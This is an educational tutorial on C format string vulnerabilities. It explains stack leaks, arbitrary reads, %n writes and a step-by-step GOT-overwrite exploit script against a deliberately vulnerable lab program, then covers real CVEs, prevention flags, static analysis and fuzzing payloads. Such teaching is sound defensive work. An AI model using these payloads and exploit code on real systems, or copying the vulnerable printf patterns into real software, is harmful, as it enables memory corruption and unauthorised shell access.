Format String Vulnerabilities — The Read-Write Primitive Hiding in printf()

Format string vulnerabilities are unique in the exploit world. Most memory corruption bugs give you either a read or a write — buffer overflows write, out-of-bounds reads leak data. Format strings give you both. A single printf(user_input) call gives the attacker the ability to read arbitrary stack memory AND write to arbitrary memory addresses.

The fix is one of the simplest in all of security: use printf("%s", input) instead of printf(input). Yet format string bugs keep appearing in production code because developers don’t understand why the first form is dangerous.

How printf() Actually Works

To understand the vulnerability, you need to understand how variadic functions work in C.

printf is a variadic function — it accepts a variable number of arguments. The first argument is always the format string, which tells printf how many additional arguments to expect and how to interpret them:

printf("Name: %s, Age: %d, Balance: %.2f\n", name, age, balance);
//     ↑ format string                        ↑ 3 additional args

When printf encounters %s, it reads the next value from the stack (or register, depending on calling convention) and interprets it as a string pointer. When it encounters %d, it reads the next value as an integer.

The critical detail: printf has no way to verify how many arguments were actually passed. It trusts the format string completely. If the format string says “read 10 arguments,” printf reads 10 values from the stack — even if only 2 were passed.

// This compiles (GCC and Clang warn under -Wformat) and usually runs without
// crashing, but it is undefined behavior:
printf("%x %x %x %x %x");  // No arguments provided

// printf reads 5 values off the stack
// Those values are whatever happens to be there — local variables,
// saved registers, return addresses, canaries, secrets...
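
The behaviour above can be mimicked with a toy model. This is a simplified Python sketch, not how libc is implemented: `toy_printf` and the contents of `stack` are made up for illustration, and only `%x` is modelled. It shows that the number of values consumed is decided by the format string alone.

```python
import re

def toy_printf(fmt, stack):
    """Toy model of printf: every %x consumes the next word on `stack`.

    Nothing checks how many arguments the caller really passed.
    """
    words = iter(stack)
    return re.sub(r"%x", lambda _match: format(next(words), "x"), fmt)

# Hypothetical stack: one real argument, then unrelated data above it.
stack = [0x2A, 0xBFFFF5A0, 0x0804A008]

intended = toy_printf("value=%x", stack)  # reads only the real argument
leaky = toy_printf("%x %x %x", stack)     # reads two words it was never given
print(intended)
print(leaky)
```

In the second call the "extra" words stand in for whatever the real stack happens to hold next to the genuine arguments.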

[Figure: How printf reads the stack]

The Vulnerable Pattern

The vulnerability exists whenever user-controlled data is used as the format string:

// VULNERABLE — user controls the format string
char *user_input = get_user_input();
printf(user_input);           // Classic format string bug
fprintf(stderr, user_input);  // Same bug, different stream
sprintf(buffer, user_input);  // Same bug, writes to buffer
snprintf(buf, sz, user_input); // Still vulnerable to read/write
syslog(LOG_INFO, user_input); // syslog takes a printf-style format string

// SAFE — user input is an argument, not the format
printf("%s", user_input);           // Safe
fprintf(stderr, "%s", user_input);  // Safe
sprintf(buffer, "%s", user_input);  // Safe (but watch buffer overflow)
syslog(LOG_INFO, "%s", user_input); // Safe

The difference is one argument. That one argument is the difference between a normal string print and giving the attacker complete control over your program’s memory.

Attack Phase 1: Reading Stack Memory

The simplest format string attack — leak information from the stack.

Basic Stack Dump

#include <stdio.h>

void vulnerable(char *input) {
    char secret[] = "S3CR3T_K3Y";
    int admin_flag = 0;

    // VULNERABLE: user input as format string
    printf(input);
    printf("\n");
}

int main(int argc, char *argv[]) {
    if (argc > 1) vulnerable(argv[1]);
    return 0;
}

Compile without protections for learning:

gcc -m32 -fno-stack-protector -no-pie -z execstack -o vuln vuln.c

Now attack:

# Leak stack values as hex
$ ./vuln "%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"
bffff5a0.00000001.0804a008.bffff798.08048460.bffff5c0.52433353.4b5f5433

# Last two values: 0x52433353 = "RC3S" and 0x4b5f5433 = "K_T3"
# Read each word right to left (little-endian): "S3CR" + "3T_K", the start of "S3CR3T_K3Y". The secret is leaked!

Each %08x reads one 4-byte value from the stack and prints it as hex. The attacker keeps adding specifiers until they’ve dumped enough of the stack to find interesting data.
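
On a little-endian x86 target, each printed word shows its bytes in reverse order, so a dump has to be decoded before it reads as text. A minimal sketch of that decoding step, assuming 32-bit words separated by dots as in the dump above (the helper name `decode_leak` is made up for illustration):

```python
import struct

def decode_leak(dump):
    """Turn a dotted dump of 32-bit hex words back into raw bytes (little-endian)."""
    words = [int(word, 16) for word in dump.split(".")]
    return b"".join(struct.pack("<I", word) for word in words)

# How the first 8 bytes of the secret look when read as two 32-bit words.
first, second = struct.unpack("<2I", b"S3CR3T_K")
dump = f"{first:08x}.{second:08x}"
recovered = decode_leak(dump)
print(dump)
print(recovered)
```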

Direct Parameter Access

Instead of dumping sequentially, %N$x reads the Nth argument directly:

# Read the 7th stack value directly
$ ./vuln "%7\$x"
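52433353

# Read as string: %s dereferences the slot as a char pointer, so it only works
# when the slot holds a pointer to a string. Slot 7 holds the secret's bytes
# themselves, so this tries to read address 0x52433353 and most likely crashes:
$ ./vuln "%7\$s"
Segmentation fault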

This is more precise and allows targeted data extraction. The attacker finds which stack position contains their target, then extracts it directly.

Reading Arbitrary Memory Addresses

The attacker can read memory at any address by combining stack control with %s:

# Step 1: Find which stack position reflects our input
$ ./vuln "AAAA%6\$x"
AAAA41414141
# Position 6 contains our input (0x41414141 = "AAAA")
# The index is illustrative: it depends on the binary and on where the input sits on the stack

# Step 2: Replace AAAA with a target address, use %s to read it as a string
$ ./vuln $(python3 -c "import sys; sys.stdout.buffer.write(b'\x10\xa0\x04\x08' + b'%6\$s')")
# Reads whatever string is stored at address 0x0804a010

This turns a format string bug into an arbitrary read — the attacker can read any readable memory address.
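
The payload from Step 2 can be generated by a small helper. This is a sketch under the assumptions used above (32-bit little-endian target, payload passed through argv); `build_read_payload` and `BAD_BYTES` are hypothetical names. The check exists because a NUL byte ends an argv string, whitespace splits an unquoted shell argument, and a stray `%` would be parsed as a directive.

```python
import struct

# Bytes that would cut short or corrupt a payload passed on the command line.
BAD_BYTES = b"\x00\t\n\r %"

def build_read_payload(address, position):
    """Pack `address` little-endian and append %<position>$s to dereference it."""
    packed = struct.pack("<I", address)
    if any(byte in BAD_BYTES for byte in packed):
        raise ValueError(f"address {address:#010x} contains a byte the payload cannot carry")
    return packed + f"%{position}$s".encode("ascii")

payload = build_read_payload(0x0804A010, 6)
print(payload)
```

An address such as 0x0804a000 is rejected because its low byte is NUL; in practice an attacker would read from a neighbouring address instead.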

What Attackers Leak

Target	Why
Stack canary	Needed to bypass stack protector in buffer overflow
Return address	Reveals code section base (defeats PIE)
libc address	Reveals libc base (defeats ASLR for ROP chains)
Heap pointers	Useful for heap exploitation
Secrets/keys	API keys, encryption keys, session tokens stored in stack variables
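
A leaked code pointer only becomes useful once it is turned into a base address. The sketch below shows that arithmetic; the leaked value and the offset are hypothetical numbers, and `base_from_leak` is an illustrative helper rather than part of any tool.

```python
PAGE_SIZE = 0x1000

def base_from_leak(leaked_address, known_offset):
    """Subtract the symbol's offset within the module from the leaked runtime address."""
    base = leaked_address - known_offset
    if base % PAGE_SIZE != 0:
        raise ValueError("base is not page-aligned; wrong offset or wrong leak?")
    return base

# Hypothetical numbers: a leaked return address and its offset inside the binary.
leaked_return = 0x565561ED
offset_in_binary = 0x11ED
pie_base = base_from_leak(leaked_return, offset_in_binary)
print(hex(pie_base))
```

The page-alignment check is a cheap sanity test: modules are mapped at page boundaries, so a misaligned result usually means the wrong offset was used.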

Attack Phase 2: Writing to Memory

This is where format strings become truly dangerous. The %n specifier writes instead of reading.

int count;
printf("Hello%n World", &count);
// %n writes the number of bytes printed so far (5) into count
// count is now 5

In a format string attack, the attacker controls which address %n writes to and what value is written:

[Figure: The %n write primitive]

Building the Write Primitive

# Step 1: We know position 6 reflects our input (from the read phase)

# Step 2: Place target address in our input, use %n to write to it
# Target: 0x0804a010 (e.g., GOT entry for puts)
# We want to write the value 0xDEAD to this address

$ ./vuln $(python3 -c "
import struct
addr = struct.pack('<I', 0x0804a010)  # Target address
# %57001x pads the output so the running total reaches 0xDEAD (57005 - 4 address bytes already printed = 57001)
payload = addr + b'%57001x%6\$n'
import sys; sys.stdout.buffer.write(payload)
")

The key insight: %n writes the number of bytes printed so far. By padding the output with %Nx (print N characters of padding), the attacker controls the written value.
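
The padding arithmetic is easy to get wrong by hand, so it helps to compute it. A minimal sketch, assuming the layout used above (the 4-byte target address comes first and is echoed before the padding); `single_write_payload` is a hypothetical helper name.

```python
import struct

def single_write_payload(address, value, position):
    """Build [address]%<pad>x%<position>$n so that %n stores `value` at `address`."""
    packed = struct.pack("<I", address)
    pad = value - len(packed)  # the 4 address bytes are already printed
    if pad < 8:
        # %<pad>x prints at least `pad` characters; an 8-digit hex value
        # would overshoot a smaller width and spoil the count.
        raise ValueError("value too small for this simple layout")
    return packed + f"%{pad}x%{position}$n".encode("ascii")

payload = single_write_payload(0x0804A010, 0xDEAD, 6)
print(payload)
```

For 0xDEAD (57005) the pad is 57001, since the four address bytes are already counted.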

Writing Large Values with Short Writes

Writing a full 4-byte value with a single %n requires printing that many characters: about 134 million for an address such as 0x0804a010, and about 3.7 billion for 0xDEADBEEF. The practical approach uses %hn (half-word write) or %hhn (byte write):

%n   — writes 4 bytes (int)
%hn  — writes 2 bytes (short)
%hhn — writes 1 byte (char)
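
The short variants store only the low bits of the running character count, which is why a count can "wrap around" to reach a smaller value. A small sketch of that truncation, assuming a 32-bit int and a 16-bit short (`stored_value` is an illustrative name):

```python
# How many bits of the running count each specifier keeps.
MASKS = {"%n": 0xFFFFFFFF, "%hn": 0xFFFF, "%hhn": 0xFF}

def stored_value(chars_printed, specifier):
    """Value that ends up in memory after `chars_printed` characters."""
    return chars_printed & MASKS[specifier]

count = 0x10804  # 67588 characters printed so far
as_int = stored_value(count, "%n")
as_short = stored_value(count, "%hn")
as_byte = stored_value(count, "%hhn")
print(hex(as_int), hex(as_short), hex(as_byte))
```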

To write 0xDEADBEEF to address 0x0804a010:

Write 0xBEEF to 0x0804a010 (low 2 bytes)  using %hn
Write 0xDEAD to 0x0804a012 (high 2 bytes)  using %hn

Payload:
  [addr_low][addr_high]%[pad1]x%[pos1]$hn%[pad2]x%[pos2]$hn

Where:
  addr_low  = \x10\xa0\x04\x08  (0x0804a010)
  addr_high = \x12\xa0\x04\x08  (0x0804a012)
  pad1 = 0xBEEF - 8 = 48871     (adjust for already printed bytes)
  pad2 = 0xDEAD - 0xBEEF = 8126 (difference between values)
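
The same calculation as a sketch in Python, assuming the payload layout shown above (two addresses first, low half written first). `two_hn_payload` is a hypothetical helper; it does not handle pads smaller than 8, where `%Nx` may print more characters than requested.

```python
import struct

def two_hn_payload(address, value, first_position):
    """Write a 32-bit `value` at `address` using two %hn writes (low half first)."""
    low, high = value & 0xFFFF, value >> 16
    header = struct.pack("<II", address, address + 2)
    printed = len(header)                  # 8 address bytes are printed first
    pad_low = (low - printed) % 0x10000
    pad_high = (high - low) % 0x10000      # wraps around when high < low
    body = f"%{pad_low}x%{first_position}$hn%{pad_high}x%{first_position + 1}$hn"
    return header + body.encode("ascii"), pad_low, pad_high

payload, pad_low, pad_high = two_hn_payload(0x0804A010, 0xDEADBEEF, 6)
print(pad_low, pad_high)
print(payload)
```

The modulo makes the helper work when the high half is smaller than the low half: the count simply runs past 0xFFFF and the 16-bit store keeps the remainder.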

GOT Overwrite — The Classic Technique

The Global Offset Table (GOT) contains function pointers for dynamically linked functions. Overwriting a GOT entry redirects future calls to that function:

Before:
  printf@GOT → 0x7f12345678 (real printf in libc)

After format string write:
  printf@GOT → 0x7f12340010 (system() in libc)

Next time the program calls printf(user_input):
  → Actually calls system(user_input)
  → If user_input = "/bin/sh" → shell!

// Vulnerable program
void process(char *input) {
    printf(input);  // Format string bug
    printf("\n");   // After GOT overwrite, this calls system("\n")

    // Better attack: if there's a second printf with controlled input
    char cmd[100];
    fgets(cmd, 100, stdin);
    printf(cmd);    // Now calls system(cmd) → system("/bin/sh")
}

Complete Exploitation Walkthrough

Here’s a realistic exploitation scenario, step by step:

// target.c — vulnerable server that reads input and logs it
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void log_message(char *msg) {
    printf("[LOG] ");
    printf(msg);        // VULNERABLE
    printf("\n");
}

void admin_panel() {
    printf("ACCESS GRANTED — admin shell\n");
    system("/bin/sh");
}

int main() {
    char input[256];
    printf("Enter message: ");
    fgets(input, sizeof(input), stdin);
    input[strcspn(input, "\n")] = '\0';

    log_message(input);
    return 0;
}

# Compile with partial protections (no PIE, no RELRO for GOT write)
gcc -m32 -fno-stack-protector -no-pie -z norelro -o target target.c

Step 1: Find input offset

$ echo 'AAAA%6$x' | ./target
[LOG] AAAA41414141
# Input is at position 6

Step 2: Find admin_panel address

$ objdump -d target | grep admin_panel
0804852d <admin_panel>:

Step 3: Find a GOT entry to overwrite

$ objdump -R target | grep printf
0804a010 R_386_JUMP_SLOT   printf@GLIBC

Step 4: Write admin_panel address (0x0804852d) to printf@GOT (0x0804a010)

# exploit.py
import struct

got_printf_low  = struct.pack('<I', 0x0804a010)  # Low 2 bytes
got_printf_high = struct.pack('<I', 0x0804a012)  # High 2 bytes

# admin_panel = 0x0804852d
# Low half  = 0x852d = 34093
# High half = 0x0804 = 2052

# Payload: [addr1][addr2] = 8 bytes already printed
# Write 0x852d to low:  need to print 34093 - 8 = 34085 more chars
# Write 0x0804 to high: 0x10804 - 0x852d = 33495 more chars (wraps to 0x0804)

payload = got_printf_low + got_printf_high
payload += b'%34085x%6$hn'    # Write 0x852d to printf@GOT low
payload += b'%33495x%7$hn'    # Write 0x0804 to printf@GOT high

import sys
sys.stdout.buffer.write(payload + b'\n')

$ python3 exploit.py | ./target
[LOG] ... (lots of whitespace padding) ...
ACCESS GRANTED — admin shell
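# The next call that goes through printf@GOT (the printf("\n") in log_message) now jumps to admin_panel() → system("/bin/sh")
# Caveat: GCC commonly compiles printf("\n") as putchar('\n'). If it does, build with -fno-builtin-printf or overwrite putchar@GOT instead.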
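
Before running a payload like this, its effect can be checked offline. The sketch below replays the directives under a simplified model: address bytes are echoed first, `%Nx` prints exactly N characters, and `%K$hn` stores the low 16 bits of the count at the address in slot K. `simulate_hn_writes` is a made-up helper, not part of any exploit framework.

```python
import re
import struct

TOKEN_RE = re.compile(rb"%(\d+)x|%(\d+)\$hn")

def simulate_hn_writes(payload, address_count, first_position):
    """Replay an [addresses][%Nx / %K$hn ...] payload; return {address: 16-bit value}."""
    header_len = 4 * address_count
    addresses = struct.unpack(f"<{address_count}I", payload[:header_len])
    printed = header_len                       # address bytes are echoed first
    memory = {}
    for match in TOKEN_RE.finditer(payload[header_len:]):
        pad, slot = match.group(1), match.group(2)
        if pad is not None:
            printed += int(pad)                # %Nx prints N characters (N >= 8 assumed)
        else:
            target = addresses[int(slot) - first_position]
            memory[target] = printed & 0xFFFF  # %hn keeps the low 16 bits
    return memory

payload = struct.pack("<II", 0x0804A010, 0x0804A012) + b"%34085x%6$hn%33495x%7$hn"
memory = simulate_hn_writes(payload, address_count=2, first_position=6)
written = memory[0x0804A010] | (memory[0x0804A012] << 16)
print(hex(written))
```

Under this model the two stores combine to 0x0804852d, the address of admin_panel in the walkthrough.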

[Figure: Exploitation chain]

Format String Bugs in Modern Code

Format string bugs aren’t limited to ancient C code. They appear in:

Logging Libraries

// C — syslog
syslog(LOG_INFO, user_input);          // VULNERABLE
syslog(LOG_INFO, "%s", user_input);    // Safe

// C++ — still possible if wrapping printf
void log(const char *msg) {
    fprintf(logfile, msg);              // VULNERABLE
    fprintf(logfile, "%s", msg);        // Safe
}

C++ iostream vs printf

// iostream is inherently safe — no format specifiers
std::cout << user_input;  // Safe — always treats as data

// But C++ code often still uses printf for formatting
printf(user_input.c_str());  // VULNERABLE — same bug

Python — Not Immune

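Python has no %n, so there is no write primitive, but str.format() called on an attacker-controlled template can still leak information:

# Python format string information disclosure
user_input = "{0.__init__.__globals__}"
print(user_input.format(some_object))
# If some_object's class defines __init__ in Python, this dumps that module's globals.
# Replacement fields allow attribute and index access but not calls,
# so a field such as {0.__class__.__subclasses__()} raises AttributeError.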

# f-strings evaluated at definition time — safe from injection
name = f"{user_input}"  # Safe — user_input is data, not format

# But str.format() with user-controlled format IS dangerous
template = user_input  # User provides: {config.secret_key}
template.format(config=app.config)  # Leaks secret_key!
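
The difference between a user-controlled template and user-controlled data can be shown in a few lines. This is a sketch with a stand-in `Config` class and a made-up secret; `string.Template` is from the standard library and substitutes plain names only, with no attribute access.

```python
from string import Template

class Config:
    """Stand-in for an application config object (hypothetical)."""
    def __init__(self):
        self.site_name = "demo"
        self.secret_key = "hunter2"

config = Config()
user_template = "Welcome to {config.site_name} {config.secret_key}"

# Dangerous: a user-supplied template can walk attributes of any argument.
leaked = user_template.format(config=config)

# Safe: constant template, user data passed only as a value.
greeting = "Welcome, {}".format("{config.secret_key}")

# If users must supply templates, string.Template substitutes plain names only.
rendered = Template("Welcome to $site_name {config.secret_key}").safe_substitute(
    site_name=config.site_name
)
print(leaked)
print(greeting)
print(rendered)
```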

Rust — Compile-Time Prevention

// Rust's format macros are checked at compile time
println!("{}", user_input);  // Safe — format is a literal

// This won't even compile:
// let fmt = user_input;
// println!(fmt);  // ERROR: format argument must be a string literal

Real-World Format String CVEs

Wu-FTPd (CVE-2000-0573)

One of the first widely exploited format string bugs. The FTP server passed user-supplied SITE EXEC arguments directly to a printf-like function. Remote root access on any system running Wu-FTPd.

sudo (CVE-2012-0809)

sudo 1.8.0 through 1.8.3p1 had a format string vulnerability in its debug logging: the program name (argv[0]) was folded into the format string passed to a printf-style function. An attacker could create a symlink with format specifiers in the name and run it with debugging enabled:

ln -s /usr/bin/sudo '%n%n%n%n'
./'%n%n%n%n' -D9  # Debug output formats argv[0]: a format string write inside a setuid-root binary

Exim Mail Server (CVE-2019-15846)

Not a printf-style bug in the strict sense, but a close relative in unsafe string handling: Exim before 4.92.2 mishandled a trailing backslash in the SNI (Server Name Indication) value sent during the TLS handshake. An attacker could send a crafted TLS ClientHello and achieve remote code execution as root on the mail server.

iOS/macOS (multiple)

Apple has had several format string vulnerabilities in system services over the years, usually in logging code that passes user-controlled data to os_log or NSLog as the format string. A well-known 2021 example: joining a Wi-Fi network whose SSID contained specifiers such as %p%s%s%s%s%n broke Wi-Fi on iPhones.

Prevention — The Complete Guide

Rule 1: Never Pass User Input as a Format String

// The one rule that prevents 100% of format string vulnerabilities:
printf("%s", user_input);   // ALWAYS use a format specifier

// This applies to EVERY printf-family function:
printf("%s", msg);
fprintf(f, "%s", msg);
sprintf(buf, "%s", msg);
snprintf(buf, sz, "%s", msg);
syslog(pri, "%s", msg);
err(1, "%s", msg);
warn("%s", msg);

Rule 2: Compiler Warnings

GCC and Clang can detect most format string bugs at compile time:

# Enable format string warnings
gcc -Wformat -Wformat-security -Werror -o program program.c

# -Wformat: Check format string/argument type mismatches
# -Wformat-security: Warn when format string is not a literal
# -Werror: Treat warnings as errors (blocks compilation)

// With -Wformat-security, this triggers a warning:
printf(user_input);
// warning: format not a string literal and no format arguments [-Wformat-security]

Rule 3: GCC’s __attribute__((format))

For custom printf-like functions, annotate them so the compiler checks their format strings:

#include <stdarg.h>  // va_list, va_start, va_end

// Tell GCC: argument 1 is a printf format, the variadic arguments start at 2
void my_log(const char *fmt, ...) __attribute__((format(printf, 1, 2)));

void my_log(const char *fmt, ...) {
    va_list args;
    va_start(args, fmt);
    vfprintf(logfile, fmt, args);
    va_end(args);
}

// Now GCC checks format string at compile time:
my_log("%s logged in", username);     // OK
my_log(user_input);                   // WARNING
my_log("%d", "not an int");           // WARNING — type mismatch

Rule 4: Static Analysis

# Clang Static Analyzer
scan-build gcc -o program program.c

# CodeQL (GitHub's static analysis)
# Rule: cpp/non-constant-format
# Detects: printf-family calls with non-constant format strings

# Coverity
# Checker: TAINTED_STRING
# Detects: User-tainted data flowing into format string position

# Flawfinder / rats
flawfinder --minlevel=3 program.c
# Reports all printf calls with non-literal format strings

Rule 5: FORTIFY_SOURCE

When compiled with -D_FORTIFY_SOURCE=2 and optimization enabled (-O1 or higher; the macro has no effect at -O0), glibc’s printf family rejects %n when the format string is in writable memory:

// With FORTIFY_SOURCE=2:
char fmt[] = "%s%n";      // Format in writable memory (stack/heap)
printf(fmt, str, &count); // *** %n in writable segment detected *** → abort

// Format in read-only memory (string literal) still works:
printf("%s%n", str, &count);  // OK — format is in .rodata

This doesn’t fix the information leak (%x/%p still work), but it prevents the write primitive.

Rule 6: Runtime Mitigations

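// glibc has no environment variable or tunable that switches %n off.
// LIBC_FATAL_STDERR_ only controls where glibc prints fatal error messages,
// and GLIBC_TUNABLES=glibc.cpu.hwcaps=... only masks CPU features.

// What does help at run time:
//   Full RELRO (-Wl,-z,relro,-z,now): the GOT is read-only after startup
//   PIE + ASLR: target addresses must be leaked before they can be written
//   A libc that rejects %n: Android's Bionic aborts on it, and Microsoft's CRT
//   keeps it disabled unless the program calls _set_printf_count_output(1)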

Format String vs Buffer Overflow

Dimension	Format String	Buffer Overflow
Cause	User input as format string	Missing bounds check on copy
Read primitive	Yes — `%x`, `%p`, `%s` leak stack	No (need separate info leak)
Write primitive	Yes — `%n` writes to memory	Yes — overwrite return addr/GOT
Precision	Can write exact values byte-by-byte	Overwrites everything in between
ASLR bypass	Built-in (leak with `%p`, write with `%n`)	Requires separate info leak
Stack canary bypass	Leak canary with `%x`, include in payload	Much harder — timing/brute force
Detection	Easy — `-Wformat-security` catches most	Harder — requires bounds analysis
Fix complexity	Trivial — add `"%s",`	Varies — may require redesign

The key advantage of format strings for attackers: they provide both read and write in a single vulnerability, making ASLR and stack canaries much easier to bypass than with buffer overflows alone.

Detection and Auditing

Grep Patterns for Code Review

# Find potentially vulnerable printf-family calls in C/C++ code
grep -rn 'printf\s*(' --include="*.c" --include="*.cpp" --include="*.h" . | \
  grep -v 'printf\s*("'
# Shows calls whose first argument is NOT a string literal.
# fprintf/sprintf/snprintf also match, because their first argument is a stream
# or buffer: review those by hand or use the sprintf pattern below.

# Find syslog calls without format specifiers
grep -rn 'syslog\s*(' --include="*.c" | grep -v '"%'

# Find sprintf without literal format (also check for buffer overflow)
grep -rn 'sprintf\s*(' --include="*.c" | grep -v 'sprintf\s*([^,]*, *"'
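
The grep patterns cannot tell which argument is the format string. A slightly more precise heuristic can be sketched in Python; `find_suspect_calls` and the argument-index table are assumptions made for illustration, and the comma split is naive (it misreads nested calls with commas before the format argument), so treat hits as review candidates only.

```python
import re

# 0-based index of the format argument for each function.
FORMAT_ARG_INDEX = {"printf": 0, "fprintf": 1, "sprintf": 1, "snprintf": 2, "syslog": 1}
CALL_RE = re.compile(r"\b(printf|fprintf|sprintf|snprintf|syslog)\s*\(([^;]*)\)\s*;")

def find_suspect_calls(source):
    """Return (line number, function) for calls whose format argument is not a literal."""
    suspects = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in CALL_RE.finditer(line):
            name, args = match.group(1), match.group(2)
            parts = [part.strip() for part in args.split(",")]
            index = FORMAT_ARG_INDEX[name]
            if index < len(parts) and not parts[index].startswith('"'):
                suspects.append((lineno, name))
    return suspects

sample = '''printf(user_input);
printf("%s", user_input);
fprintf(stderr, user_input);
syslog(LOG_INFO, "%s", user_input);
snprintf(buf, sizeof(buf), msg);
'''
suspects = find_suspect_calls(sample)
print(suspects)
```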

Automated Testing

# Fuzz with format string payloads
echo '%x%x%x%x%x%x%x%x' | ./program
echo '%s%s%s%s%s%s%s%s' | ./program  # Likely crashes if vulnerable
echo '%n%n%n%n%n%n%n%n' | ./program  # Crashes = write works (FORTIFY stops this)
echo 'AAAA%p%p%p%p%p%p%p%p' | ./program  # Look for 0x41414141 in output

# If any of these produce unexpected output or crashes, investigate.
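
These probes can be wrapped in a small harness. The sketch below is a heuristic under stated assumptions: the target reads one line on stdin and echoes it somewhere in its output. `probe` and `PROBES` are hypothetical names, and the demonstration target is a harmless echo script rather than a real program.

```python
import subprocess
import sys

PROBES = [b"%x%x%x%x%x%x%x%x", b"AAAA%p%p%p%p%p%p%p%p"]

def probe(command, payload, timeout=5):
    """Feed one payload on stdin and classify the result."""
    result = subprocess.run(command, input=payload + b"\n",
                            capture_output=True, timeout=timeout)
    if result.returncode < 0:
        return "crashed"          # killed by a signal (POSIX)
    if payload in result.stdout:
        return "echoed verbatim"  # specifiers were not interpreted
    return "interpreted?"         # output differs: investigate by hand

# Demonstration target: a harmless echo implemented with the current Python.
echo_target = [sys.executable, "-c",
               "import sys; sys.stdout.write(sys.stdin.read())"]
results = {payload: probe(echo_target, payload) for payload in PROBES}
print(results)
```

A target that never echoes its input will also land in the "interpreted?" bucket, so that result is a prompt for manual review, not proof of a bug.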

Security Checklist

CODE:
[ ] No printf-family call uses user input as format string
[ ] All custom logging functions use "%s" for user data
[ ] Custom printf-like functions have __attribute__((format))
[ ] No string concatenation to build format strings with user data
[ ] Python str.format() is never called on a user-controlled template

COMPILE:
[ ] -Wformat and -Wformat-security enabled
[ ] -Werror treats format warnings as errors
[ ] -D_FORTIFY_SOURCE=2 enabled (blocks %n in writable memory)
[ ] Static analysis runs in CI (CodeQL, Coverity, or clang-tidy)

RUNTIME:
[ ] ASLR enabled
[ ] Full RELRO (-Wl,-z,relro,-z,now) prevents GOT overwrite
[ ] PIE enabled (makes GOT address unpredictable)
[ ] Stack canaries enabled (-fstack-protector-strong)

REVIEW:
[ ] Code review checklist includes format string patterns
[ ] Grep audit for printf-family calls run before release
[ ] Fuzz testing includes format string payloads

Format string vulnerabilities are the easiest critical bug to prevent. One rule — printf("%s", input) — eliminates the entire class. Yet they keep appearing because developers don’t understand what printf(input) actually does at the machine level. Now you do.